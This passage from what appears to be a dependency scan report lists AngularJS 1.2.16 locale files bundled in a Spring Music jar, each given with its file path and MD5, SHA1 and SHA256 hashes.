MD5: 14ed457ba02b2106539c6856ced97678
SHA1: 57d8ea468d417ab87c7176cb772d1024d259c955
SHA256: 6eaad3756adc17b69aa57519c59f6420446d283de7d70c6c3c4290daae08a2eb

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-ch.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-ch.js
MD5: 5c3af6e2464edbf680799781f9bd17ed
SHA1: 170d8415551e91fc7a3de5f5cbcc26e4e105ee2a
SHA256: 1ba4d14e8f16d6121f193c650ffc51be561f7e0e3f335fe775ed73f21db59268

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-ci.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-ci.js
MD5: 49a8dc4b5491eee28217972a1d9f1fba
SHA1: aa25e0747e87e271c76f6c9132044d6cedaa74f3
SHA256: 3f31fa4c82a06106b1ce2be1fc33d13334770c7f39a23b691260ad2b94cbbb69

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-cm.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-cm.js
MD5: bf540f9fc35e87b6c861fa1d3d6664f1
SHA1: 7372399c2667a27db13802591b1dcea944d3ff2f
SHA256: ffea2642066f3cb90173537ff2ad10e584a8594d9597d2cccd652f14ad47896b

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-dj.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-dj.js
MD5: dd3ea1b9a1b27e603e2dca66acab96b7
SHA1: 24881d62909f88b05df6385c1ba6790d2031e6b5
SHA256: 39ab36940a98499e972a4a07b36420a8b5f04c4d4b0b778d9c74872b25360ca6

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-fr.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-fr.js
MD5: afed422350b2c4d5d9afe835350f526c
SHA1: 88b96489544fd040693845e5816a4825cd18eeff
SHA256: c1a6157fe9d6aac34ee7f68ef59e8c0cb1ec0701a4608a4ce7905261072b3cc9

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-ga.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-ga.js
MD5: 93843d4f7680364076924efeb1ba4d59
SHA1: 1ae5921d6dabeb84eb75265388f3409bf2f2735d
SHA256: d4348e6582f42d94288fd24f46d6d23c5265c447d28f4cdfc9d610021b882c51

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-gf.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-gf.js
MD5: 2730e52c178cd2a9f91ebea0dbb7ed37
SHA1: 30da44da24a85e865cdd10819e83dacd69c91fc9
SHA256: 2fcdcbe81231389f4dec1ba6a32bf182e9dde48881081b50e1c80c4f11ea3437

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-gn.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-gn.js
MD5: 4403eb2d38193044b42e3d67a4ddf067
SHA1: a55515cd25a616ac8cfff8e31919699ad92cf4b6
SHA256: fd5ef4d8ab8d1a86617a1a4f36bf96d2fe0a33cb0239906c4bb86bd12abaab44

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-gp.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-gp.js
MD5: f9fb0f9dc812fdaca34c550c89be1050
SHA1: 5bb56d4cc2a83124444cb22e270709489f90b8c9
SHA256: f098f8920132d2977cc1eb466ead9406ec5b81ae96b60e7779fea995fe38455a

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-gq.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-gq.js
MD5: bee0ec6d5c568aff5febc52dc7047524
SHA1: 18cf27cf315f7b77a1f9dfc3f5ca8b695b9bb804
SHA256: 571ba04071cf57f995f78470d2b648efcd64871bb28275afca09d5acfd3badc1

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-km.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-km.js
MD5: cf727f3fbd5c047af4da449842dec558
SHA1: f639d6e2bcd1c8de74875b295eb8ebdbc38eb306
SHA256: 5f23c4945c322bbf10c345951e895f111d54d2a69a1d5484d82f4f5f765dcd3d

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-lu.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-lu.js
MD5: c558d9f8f7a6de7283bbedcc7841f283
SHA1: 546e1f8f6862d6b0beb3bea12cbda68f9e0a7992
SHA256: 965977fcae7bbeb447b9e2713e0686cf0bf40f1db67c1b9801f282994666fdbe

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-mc.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-mc.js
MD5: 38f8ea87af205cd75e2f37033967399e
SHA1: 618576c72670a82ae17453c73c8608767d48b7f2
SHA256: bbae70ec09b3e779cd511d09736fc2a30c04569a8b9491e7887759f920179476

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-mf.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-mf.js
MD5: f851a63cc9997f4010d0fad63cb4dec9
SHA1: 5d93a550697260aa1e12a04c9e750ada3c32e4bf
SHA256: 27f634c682b2ee71b56a65f78b4b4b64f3f57aa4fad26985585422ad1a1839fd

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-mg.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-mg.js
MD5: 47ddcf985470dfe0037f4eb196380882
SHA1: 0e4f8fd2d9ec0b1b350780124f072133bb66bd0f
SHA256: ef9ac88c85eb902101364e0fac8ac99c0e551bae2f6057c78a36e4c2fb023431

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-ml.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-ml.js
MD5: 44bdbc0623d97243db498907f14bce73
SHA1: 120e848ebfb8558467913a29ebad58686a91730b
SHA256: a541c16bbd4131617598a35874fbb0a813b2cdbd4cb00a13030269fd3ad28cf7

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-mq.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-mq.js
MD5: b980469605f5630c2bc81e42a8796bcc
SHA1: 37a3e4597ba2119e7fd6450b92d21fd71d0cd20b
SHA256: 8ad07d6e053f707b7c45ce5254024be6ee7a9bc9648e699f41617b08b6481259

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-ne.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-ne.js
MD5: 4f59cbd5db45f02b4c5a3489abb95207
SHA1: 64bfe85d2c3603b995925a74ab63cff291b5727e
SHA256: c50db30b0db5f1deba985a56d03f19484f7360fe8fb0cee3f8202ff0ca1ff5c9

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-re.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-re.js
MD5: 5749f4a52e62f4577e0d3fec47b8cd42
SHA1: 568a8335928c8b712dd2b35686fee3cdb6c172ac
SHA256: 350d388776510b7a525eb6572ff16606c37f07613c433d6a49c9946b86d39ecb

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr-yt.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr-yt.js
MD5: 81c34f2e86590c1892882d9dd1df1bb6
SHA1: 3b7ebce0939cc72195b4dfefdab0f7fccc42aa30
SHA256: 312a69bc50184f45ee99a4e70d09880ca3175bdaff96e8cfa25560156767f4f5

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_fr.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_fr.js
MD5: ccc2a5c0f3d1f5d490e5bcc4ee8490cd
SHA1: 0ac35fa16e791db448ca5f6939e714c261d36482
SHA256: b4d045fbf379221425b9db0a61ff9ec978ef79599a1e8a845cc9160949f390a0

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_gl-es.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_gl-es.js
MD5: 4de671d4595f4f8a62f3f9e56b494b7a
SHA1: 0845bbbdc0dc9c28b30bf2342357ad83adb5a262
SHA256: d5c72e1505a62be55a0868b89315f7b5cdec3f9cd158f999bd7f942551f493d8

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_gl.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_gl.js
MD5: 3614f73523bef9f711d0438c6c39031c
SHA1: 22ea0e3aee14f217f88a95521e78d14db106ba97
SHA256: f0424becc2711c7ccec735d30a5823780489985f5e17a9e7717d5072b9380bae

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_gsw-ch.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_gsw-ch.js
MD5: 55d8cca70af392856952dcc1ce027742
SHA1: 05e4b07a6b742ab7d75c1d75122968871b8140e2
SHA256: d39e650649f122beeb3c836201899ab0304cbf3175cf1675b7a66e10e01064a0

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_gsw.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_gsw.js
MD5: 0eba015634442d4cd7604270c824a464
SHA1: 90ce98a2d9b51d9d14918c5ca1564f58209d0b3c
SHA256: 9be1602638655676144c21b0c20542e9789c83e0c6bb4796b1090f6b598285d9

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_gu-in.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_gu-in.js
MD5: 5ff733f264bda216f4b94e6a6a8c09ae
SHA1: cd0ede1ad91bcd8bd2c32ae8193e07c9a7ad804f
SHA256: e527875adf221e4e6ad17d6ec468d18080694ccb2a38a2771b99e6e64e08cab3

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_gu.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_gu.js
MD5: eebfe679cd71a191d098e69478bc9b9f
SHA1: 60fe13f75d1c5221d7b270e855bac4ad283967f4
SHA256: bc21a35330c0d1da49d72c06256709e5b9ff9077e16daaff832002df82c0fe96

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_he-il.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_he-il.js
MD5: 344793ccd016737fed0cba312d5aafcb
SHA1: 92f62aa3cae3fd0fa7af7f776139dadabd647de4
SHA256: 595a5981ebcb57d8a2c48a230e0a63ec714396ece9ea5dbbcd1009d7582705a7

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_he.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_he.js
MD5: b61c92fe498631afe5a7ad8e54ae0947
SHA1: 70edcd3b52176482a4a85f923a5f84d143166156
SHA256: 5a87809505f2a2bf240820c1b629a53837765f82678a95a751c8f3ca9620d573

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_hi-in.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_hi-in.js
MD5: 8783fbf56886f9da2bb92022e3d579b5
SHA1: 936457a1b3347f6887f8eed44ea0c2615350fbb9
SHA256: 6b4e91b89584824287e946852d8cb60cfe7cfecd2a255ebb86794309b308a36f

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_hi.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_hi.js
MD5: a9c6ccfcf41b8cd2f85cd3b488d7458f
SHA1: 21f72b0f0c7aad980b914169f0943bdc4cb97e7f
SHA256: deb747107e6f2f26560b2dca55374f1518eb73b869ea6e332f692975511d52ab

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_hr-hr.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_hr-hr.js
MD5: 271573e977ff37b352d7a5b65951a134
SHA1: 776929decf3ebb83304040d5e7b71973135c27b3
SHA256: 00a216befac37cc1005d9f30e6289e96379a91641d5b4ce16693b10575288365

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_hr.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_hr.js
MD5: e379df48b004a1f4403c761f18fad960
SHA1: 8b4c435c7675072daea765bab04ea43e2f2f046e
SHA256: 15927d3d51916f688404edf2c2fb995530003e1fc884d16d1591b7f143f389c8

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_hu-hu.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_hu-hu.js
MD5: 1a682c3922956fe7da9e26ba326ce149
SHA1: 1dfd2b846b0b0e2ddf608447822186d228e5c31a
SHA256: 58b8b795542ddb99ca9ad32c438d343593be83840f39ad67e762db566eb395f6

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_hu.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_hu.js
MD5: 655a8e9632d7da8d4049314e9acc8767
SHA1: 7f1f757eaa1a3e7440e478f7208e3c9a9d0207b4
SHA256: a8491827a9edee1437927098b3550345589ec40ba2c6b5f1384aa9a5ca9b95cd

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_id-id.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_id-id.js
MD5: 95dc9bde7eb5b9fbf8ae9e8bf172897e
SHA1: 806aad016857f7ead21cd99444100175d50aba0f
SHA256: 8337765b43a6512ce0624b8e175cc0d7c8341cb3813767b1a1de5f824d392b03

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_id.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_id.js
MD5: 9c0d2c7c97d3e68129bf2efbda096837
SHA1: 0a5b0d4ad0f2d49441129df3ce26d2902373b5ec
SHA256: 1c24bb6d565842443451ddbac553ae7fa14f86ea411384d8d4a3719f498c0c79

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_in.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_in.js
MD5: e82a2ee0efbfac306d0bf833c3829cb6
SHA1: 5d6025657df311961d5ae06a273b36b329b4f441
SHA256: 090ebf0b766876d5ae2da13ff2c2fd93f1aa4a987372b44449c4ccc573636ac2

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_is-is.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_is-is.js
MD5: 4ac8d57b7dcb0ea4434a7d3b500daa44
SHA1: 3f8557b09e9a57c218a76ac2153ada77bab82ff9
SHA256: 25b261795082232bc0d4031c9629128ced085fff6ad5260e4385a675070c957e

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_is.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_is.js
MD5: 7c8adcfb0832f10488bf4c58d5506c03
SHA1: e7a675102e48f08e1680046cd43a35799e7f7aef
SHA256: f6c8d3b8cadadd2c9885c2d09e9e79d50268a58c4e7b4845ced4c7014665e41c

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_it-it.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_it-it.js
MD5: 44949346e81e04906d0be762cd0dee55
SHA1: b764bcff9ceee86ab698756e455da3ddc69b6855
SHA256: 50e6ee8feaa0c4ce9ffe5b379a902248b3dd671d6e5fd124e511556486aa78e3

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_it-sm.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_it-sm.js
MD5: 83fb1e484a4d7a66de03e0fb52caabe5
SHA1: fa51c3f20987be95ad7b461651ed8661411daf56
SHA256: ff43bc5d530cf5818803ee347a360ec501c1da1cf42ad6da15228ddff3e86b5a

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_it.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_it.js
MD5: e67759a45a69d464bd543c49eaa75c78
SHA1: 68bc5ac8e359911f38aef64b584ef4fee41a25e9
SHA256: 641a4b0012e596d99dc82372612cb5877e6c8b33533d968896941d1da8e5f5c1

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_iw.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_iw.js
MD5: 455046a8a48c7942a6e4a93206003848
SHA1: dee19ea6365eb0cdd6f3f423ef8021fa1b8f8452
SHA256: e5d234269244a691942f4f298c77f078613d8d7ca9a2ee6c704728a905ccfb1c

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ja-jp.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ja-jp.js
MD5: 56953e723edf83dd4b42687219e048cc
SHA1: 1e48739d43f8f782c3e0a7c3d0c1f2e2bfef4ab2
SHA256: 00c67c25fbbdc08ce4dd7b8581d7b523213e49cb7d47e9b1e2ce99f665465eb7
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ja.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ja.jsMD5: 8fb73aaed1baaed8b33d445fd3b46f49SHA1: 3e0040b7d567ef0f760b969690a587fcfd7c535bSHA256: af8897bbd08dc174fb9d01233d62b1b288d7b4be4ebb837f5f851290ae892f4a
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_kn-in.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_kn-in.jsMD5: cb61d4674353fb44360528b32eafb1a1SHA1: 8f3b23374cab65307d7e93196cc4d634d5b2e697SHA256: 33d52e88759e4cc4b49289002bc0fa254898b109b18350c289e0b6b2f462944a
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_kn.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_kn.jsMD5: c3033d2d26cca26be5bf98758a558a64SHA1: 264728fc101f857f34f560330efc97f0b27bfdc5SHA256: 0b82030d06d833e43824275082203146716ff5b95daa49a921354784a007ae72
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ko-kr.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ko-kr.jsMD5: 254b33832a86d6f8bf28c6fa7b254da7SHA1: 6a0f6220460c36fa864666a9d572f9fea1fd94beSHA256: af1d2f590862da1686e03f4474b06c5038bf59b9fafd1b8976a5da8fe1673749
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ko.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ko.jsMD5: b65089d6cc0d60cd612e7d157f92bb97SHA1: 5fb6ad592dbb07ace5dfab6f6ab72fd9df19f798SHA256: 4dabb21b3828339a536583d883bb786a69c3e7da1a91152de5e66c0fc4ad49d7
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ln-cd.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ln-cd.jsMD5: cf13e705b9af3b69a1094176099d6fafSHA1: a3370aa93e0d69e76276128338458655c7e2ee26SHA256: af061f2c2f9cee331977bfcad26ee7efc77ffa0c24e758f76fd55699a346245e
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ln.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ln.jsMD5: 710ef14e23cceb81f8a27698e6eaeceaSHA1: 552136494f463d3d19c08c74971f8eeb5d5585d0SHA256: dbff5a2d23d06ea14d7da4ec474fb02bf868b1494b9b43cf117621ce87bd390c
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_lt-lt.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_lt-lt.jsMD5: 4526fc8ccfe676e1b26beeb03c176aceSHA1: f0b415bc5cf27f477511ff23c62c9b0a4d0c4fbdSHA256: 5e9b4320510d952a0e1b7324c0b3a9445ddae24b9e4bfcd787e1d9158c8f089a
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_lt.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_lt.jsMD5: c14b1e1735fe56b5b7476db0d6f4c9c9SHA1: ae3537351caef1866e9ac114a1a2d81b393990f5SHA256: 02e85bcb9626a429117ba41052133ad59b86103632435793030dd4625e3361ec
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_lv-lv.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_lv-lv.jsMD5: 851b96bad84cf32c3a382ab4c4dc9a29SHA1: 423e5dab762c58c37a3ec9aa5e8268d301d86ac1SHA256: 04151154243526789a34f4573ba0cd61461c43e20c2bc08f8b407597b316a626
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_lv.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_lv.jsMD5: 7d914954fa4facedb14a126ea2ca7359SHA1: 1c531d549afacf7d7022b85f1fde81461ce50783SHA256: 6167e3c681099bffcd4e42c2b17c727e1dc44376e6f647f15c93b7a63306add6
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ml-in.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ml-in.jsMD5: 670502bc05fdcb5e5f63441938d669b3SHA1: 45b098333c1532687078d9cfc28dbf8fd7decd12SHA256: 0185eb7de7f55fbd55ffe626c1d690bdf6461ba7574f2644f88c571385c718ae
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ml.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ml.jsMD5: 6751948a95bbbf735f7b4883710c5187SHA1: dc256dd2ed3bad1515da3f1768eb81791ad97e39SHA256: a5d28d30f7561f135675df83533073e5375535fa91b6eb75931ba4df9f873bb8
Evidence Type Source Name Value Confidence
